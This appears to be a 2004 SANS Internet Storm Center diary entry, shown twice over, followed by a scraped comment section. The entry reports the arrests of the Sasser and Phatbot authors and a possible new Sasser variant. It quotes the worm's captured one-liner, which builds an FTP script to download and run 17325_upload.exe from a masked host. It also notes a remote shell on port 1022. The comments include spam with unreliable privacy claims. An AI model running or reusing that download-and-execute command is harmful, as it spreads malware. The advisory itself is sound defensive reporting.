Author of Sasser worm and Phatbot caught; New Sasser Worm Variant; SANS Security Newsletters and Digests
Author of Sasser worm and Phatbot caught
Several news have reported that the author of Sasser worm has been caught in Germany. Check this out at:
http://news.bbc.co.uk/1/hi/world/europe/3695857.stm
http://news.yahoo.com/news?tmpl=story&cid=562&u=/ap/20040508/ap_on_hi_te/germany_computer_worm&printer=1
http://www.reuters.com/newsArticle.jhtml?type=internetNews&storyID=5080701
http://www.lka.niedersachsen.de/aktuelles/archiv/2004/sasser_080504.htm (German)
In a Microsoft Press Release, Microsoft says that they will hold a teleconference about this arrest:
http://www.microsoft.com/presspass/press/2004/may04/05-08SasserArrestMA.asp
Another piece of news also reported that Phatbot creator has been hunted down too:
http://www.heise.de/newsticker/meldung/47209 (German)
http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?database=JanEE%2edb&command=viewone&id=15
New Sasser Worm Variant
We received a submission from Duda that he has detected a possible new Sasser worm variant infection via port 1023 instead of the usual port 5554. If you have seen this, please let us know.
echo off&echo open xx.xx.xx.xx 1023>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get 17325_upload.exe>>cmd.ftp
&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&17325_upload.exe&echo off&del cmd.ftp&echo on
According to Mcafee writeup, this is the Sasser E variant and it matches the ports used:
* It creates a remote shell on TCP port 1022 rather than 9995 or 9996
* It uses FTP on TCP port 1023 instead of 5554
http://vil.nai.com/vil/content/v_125091.htm
SANS Security Newsletters and Digests
Too much news to catch up? SANS provides weekly security newsletters and digests. This allows you to update yourself especially if you are not able to track security news everyday. Over the weekend, do take a look and sign up for the free newsletters and digests.
http://www.sans.org/newsletters/
Several news have reported that the author of Sasser worm has been caught in Germany. Check this out at:
http://news.bbc.co.uk/1/hi/world/europe/3695857.stm
http://news.yahoo.com/news?tmpl=story&cid=562&u=/ap/20040508/ap_on_hi_te/germany_computer_worm&printer=1
http://www.reuters.com/newsArticle.jhtml?type=internetNews&storyID=5080701
http://www.lka.niedersachsen.de/aktuelles/archiv/2004/sasser_080504.htm (German)
In a Microsoft Press Release, Microsoft says that they will hold a teleconference about this arrest:
http://www.microsoft.com/presspass/press/2004/may04/05-08SasserArrestMA.asp
Another piece of news also reported that Phatbot creator has been hunted down too:
http://www.heise.de/newsticker/meldung/47209 (German)
http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?database=JanEE%2edb&command=viewone&id=15
New Sasser Worm Variant
We received a submission from Duda that he has detected a possible new Sasser worm variant infection via port 1023 instead of the usual port 5554. If you have seen this, please let us know.
echo off&echo open xx.xx.xx.xx 1023>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get 17325_upload.exe>>cmd.ftp
&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&17325_upload.exe&echo off&del cmd.ftp&echo on
According to Mcafee writeup, this is the Sasser E variant and it matches the ports used:
* It creates a remote shell on TCP port 1022 rather than 9995 or 9996
* It uses FTP on TCP port 1023 instead of 5554
http://vil.nai.com/vil/content/v_125091.htm
SANS Security Newsletters and Digests
Too much news to catch up? SANS provides weekly security newsletters and digests. This allows you to update yourself especially if you are not able to track security news everyday. Over the weekend, do take a look and sign up for the free newsletters and digests.
http://www.sans.org/newsletters/
Keywords:
0 comment(s)
×
![modal content]()
Diary Archives
Comments
www
Nov 17th 2022
6 months ago
EEW
Nov 17th 2022
6 months ago
qwq
Nov 17th 2022
6 months ago
mashood
Nov 17th 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
6 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
isc.sans.edu
Dec 26th 2022
5 months ago
isc.sans.edu
Dec 26th 2022
5 months ago